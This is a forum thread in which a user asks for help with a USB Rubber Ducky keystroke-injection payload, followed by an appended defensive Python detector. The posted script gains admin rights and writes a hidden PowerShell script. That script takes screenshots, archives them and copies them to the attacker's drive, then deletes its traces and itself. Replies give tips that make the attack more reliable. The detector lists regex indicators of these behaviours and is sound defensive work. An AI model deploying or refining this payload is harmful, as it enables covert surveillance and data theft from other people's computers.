trib Posted October 6, 2015

Hello everyone, I am a newbie and not an IT expert. I just know the basics of coding. I have had my USB for 3 months, but I only successfully flashed it using Windows 2 days ago, since it's quite complicated to me. Currently my USB Ducky is using the Twin Duck 2.1 firmware and it was tested on Windows 10. It can execute the simple "Hello World" payload, but it can't execute the "Take screen captures" payload. I encoded it using the online encoder website (http://ducktoolkit-411.rhcloud.com/Home.jsp). The reporting method was copying to my USB drive. DUCKY is the name that I filled in in the next step. (Do I need to format it in lowercase as suggested?)

Here is the script:

DELAY 1050
GUI r
DELAY 1050
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 1050
ALT y
DELAY 1050
ENTER
ALT SPACE
DELAY 1050
STRING m
DELAY 1050
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory
ENTER
STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth
ENTER
STRING $displayWidth = $displayInfo.ScreenWidth
ENTER
STRING $displayHeight = $displayInfo.ScreenHeight
ENTER
STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing")
ENTER
STRING $x = 0
ENTER
STRING do { Start-Sleep -Seconds 60
ENTER
STRING $jpegName = (get-date).ToString('HHmmss')
ENTER
STRING $image = new-object System.Drawing.Bitmap 1366 ,768
ENTER
STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight
ENTER
STRING $screen = [system.Drawing.Graphics]::FromImage($image)
ENTER
STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy))
ENTER
STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg));
ENTER
STRING $x++ } while ($x -ne 2);
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $usbPresent = 'False'
ENTER
STRING do {
ENTER
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure
ENTER
STRING if ($present.Count -ge 1){
ENTER
STRING $usbPresent = 'True' }Else {
ENTER
STRING $usbPresent = 'False'}}
ENTER
STRING until ($usbPresent -eq 'True')
ENTER
STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name
ENTER
STRING move-item c:\Windows\Report.zip $driveLetter.Name
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY 1050
STRING C:\Windows\config-156e3.ps1
ENTER
DELAY 1050
ALT F4
DELAY 1050
GUI r
DELAY 1050
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1050
ALT y
DELAY 1050
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 1050
STRING m
DELAY 1050
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1050
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER

I increased the delay time and also executed the script by myself to debug. I found something that I think may be the issue.

- I found that the "ALT y" command on the 7th line did not make any change when I executed it. Neither did the one on the 172nd line. Not to mention that it was combined with the command "STRING mode con:cols=14 lines=1" and turned into "ymode", and then the error was "'ymode' is not recognized as an internal or external command, operable program or batch file". So I erased it.

- After erasing the "ALT y" command, there was an error. The USB executed that script with this warning: "The screen cannot be set to the number of lines and columns specified".

I think I'm currently stuck here. I don't understand what this command means. Can anyone help me solve this?
Peyo Posted October 6, 2015

The ALT Y command is used when a modal dialog appears and you want to select a button with a shortcut with the letter Y. In this case, the script is trying to select the "Yes" option. That order only works on Windows with English as the primary language (for example, in Spanish the combination is "ALT S"). To avoid language dependence, I recommend you use "LEFTARROW+ENTER", assuming any admin order has the option "No" preselected, on a scheme where the order is "YES - NO".

Before going on, I suggest you understand the script, trying to reproduce it line by line. There is no sense in sending a payload that you don't understand (i.e., if you have a disk partition, why do you need to create a file when you can simply execute it from the ducky drive?)
trib Posted October 7, 2015 (Author)

> The ALT Y command is used when a modal dialog appears and you want to select a button with a shortcut with the letter Y. In this case, the script is trying to select the "Yes" option. That order only works on Windows with English as the primary language (for example, in Spanish the combination is "ALT S"). To avoid language dependence, I recommend you use "LEFTARROW+ENTER", assuming any admin order has the option "No" preselected, on a scheme where the order is "YES - NO".
>
> Before going on, I suggest you understand the script, trying to reproduce it line by line. There is no sense in sending a payload that you don't understand (i.e., if you have a disk partition, why do you need to create a file when you can simply execute it from the ducky drive?)

Thank you for your reply. I do understand the script, since I read the ducky script carefully. I also executed every line in the script by myself, not by the USB. I found that every step was executed smoothly; it just got stuck at the command STRING mode con:cols=14 lines=1 after saving the notepad file (config-156e3.ps1) into C:\. I understand the ducky script, but I admit that I'm not so familiar with CMD commands. All I know about those CMD commands is: create a notepad file > save it to C:\ > then execute it by CMD. I will try to learn CMD commands later. Now I'm just trying to understand what the error is here. And I think it's because of a wrong ducky script.
Peyo Posted October 8, 2015

I've tested those commands on a Win7: opening an admin command prompt with powershell, resizing (the mode string), selecting "move" and moving down with the down arrow key, and it works like a charm. Maybe the prior commands are the trouble in the full sequence. Are you sure the sequence is executed correctly? I mean, is it really saving (Control+S), typing the filename (C:\...) and closing the file (ALT+F4) before opening the command prompt? For example, if the save dialog is not showing in time (1.05 secs in your case), the rest of the commands are pointless. Anyway, if you "move down" the cmd window, the resize function is not necessary ;)
trib Posted October 8, 2015 (Author)

> I've tested those commands on a Win7: opening an admin command prompt with powershell, resizing (the mode string), selecting "move" and moving down with the down arrow key, and it works like a charm. Maybe the prior commands are the trouble in the full sequence. Are you sure the sequence is executed correctly? I mean, is it really saving (Control+S), typing the filename (C:\...) and closing the file (ALT+F4) before opening the command prompt? For example, if the save dialog is not showing in time (1.05 secs in your case), the rest of the commands are pointless. Anyway, if you "move down" the cmd window, the resize function is not necessary ;)

Yes, it did save a notepad file named config-xxx into C:\Windows. Everything seems to be ok until the script executes the command "mode con:cols=14 lines=1". So I guess the problem must be in the prior commands, as you said. So what should I do now? :(
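From the defender's side of this thread: the payload above leaves a very recognisable trail in PowerShell command-line and script-block logging (an elevated launch via `-Verb runAs`, `Set-ExecutionPolicy 'Unrestricted'`, a hidden-window script run from `C:\Windows`, the `System.Drawing` capture loop, polling `Win32_Volume` for a drive labelled `DUCKY`, and the script deleting itself). The following Python is an added example for this thread, not code from the posts or from the Duck Toolkit; the indicator names, weights, threshold and every sample line are constructed for illustration rather than real telemetry.

```python
"""Heuristic triage of PowerShell command lines and script blocks for the
behaviours the payload in this thread depends on.

Added example for this thread; not part of the original posts or of the
Duck Toolkit.  Indicator names, weights, the threshold and all sample
lines below are constructed for illustration, not real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Indicator:
    name: str
    pattern: re.Pattern
    weight: int


# One indicator per behaviour seen in the posted script.  None is conclusive
# alone (admins resize consoles and run scripts from disk too), so each
# carries a weight and the decision is made on the combined score.
INDICATORS = (
    Indicator("elevation-via-runas",
              re.compile(r"Start-Process\s+\S+\s+-Verb\s+runAs", re.I), 2),
    Indicator("execution-policy-unrestricted",
              re.compile(r"Set-ExecutionPolicy\s+['\"]?Unrestricted", re.I), 3),
    Indicator("hidden-window-script",
              re.compile(r"-windowstyle\s+hidden\b.*-File\s", re.I), 3),
    Indicator("script-in-windows-dir",
              re.compile(r"C:\\Windows\\[^\\\s]+\.ps1", re.I), 2),
    Indicator("screen-capture-api",
              re.compile(r"CopyFromScreen|System\.Drawing\.Bitmap", re.I), 3),
    Indicator("console-shrunk",
              re.compile(r"mode\s+con:\s*cols=\d+\s+lines=\d+", re.I), 1),
    Indicator("volume-label-poll",
              re.compile(r"Win32_Volume.*\.Label\s+-eq", re.I), 2),
    Indicator("self-delete",
              re.compile(r"Remove-Item\s+\$MyInvocation\.InvocationName", re.I), 3),
)

SUSPICIOUS_THRESHOLD = 3  # constructed cut-off for this example


def match_indicators(text: str) -> list[str]:
    """Names of every indicator that fires anywhere in `text` (one command
    line or a whole script block), in table order."""
    return [ind.name for ind in INDICATORS if ind.pattern.search(text)]


def score(text: str) -> int:
    """Sum of the weights of the indicators that fire on `text`; each
    indicator counts once even if it matches several times."""
    return sum(ind.weight for ind in INDICATORS if ind.pattern.search(text))


def triage(command_lines, threshold=SUSPICIOUS_THRESHOLD):
    """Per-line triage: (score, indicator names, line) for every line at or
    above `threshold`, highest score first (stable for equal scores)."""
    hits = [(score(line), match_indicators(line), line)
            for line in command_lines if score(line) >= threshold]
    hits.sort(key=lambda hit: hit[0], reverse=True)
    return hits


# Constructed process-creation command lines, modelled on the thread.
SAMPLE_COMMAND_LINES = [
    "powershell Start-Process notepad -Verb runAs",
    "powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false",
    "powershell.exe -windowstyle hidden -File C:\\Windows\\config.ps1",
    "powershell.exe -File C:\\Scripts\\backup.ps1",   # benign-looking scheduled job
    "mode con:cols=14 lines=1",
    "powershell Get-ChildItem C:\\Users",
]

# Constructed script-block fragment: each line is weak on its own, but the
# combination across one block is what makes it distinctive.
SAMPLE_SCRIPT_BLOCK = """\
$image = new-object System.Drawing.Bitmap 1366,768
$screen.copyfromscreen(0,0,0,0, $imageSize)
$present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure
Remove-Item $MyINvocation.InvocationName
"""

if __name__ == "__main__":
    for s, names, line in triage(SAMPLE_COMMAND_LINES):
        print(f"[{s}] {line}\n     {', '.join(names)}")
    print("script block:", score(SAMPLE_SCRIPT_BLOCK),
          match_indicators(SAMPLE_SCRIPT_BLOCK))
```

Run as-is it prints the per-line triage and then the whole-block score. The two views make the practical point: the `mode con` resize and the `-Verb runAs` launch are weak signals by themselves and only become meaningful next to the hidden-window launch, the capture loop and the self-deletion, which is why a block-level (or per-process) aggregate is the one worth alerting on.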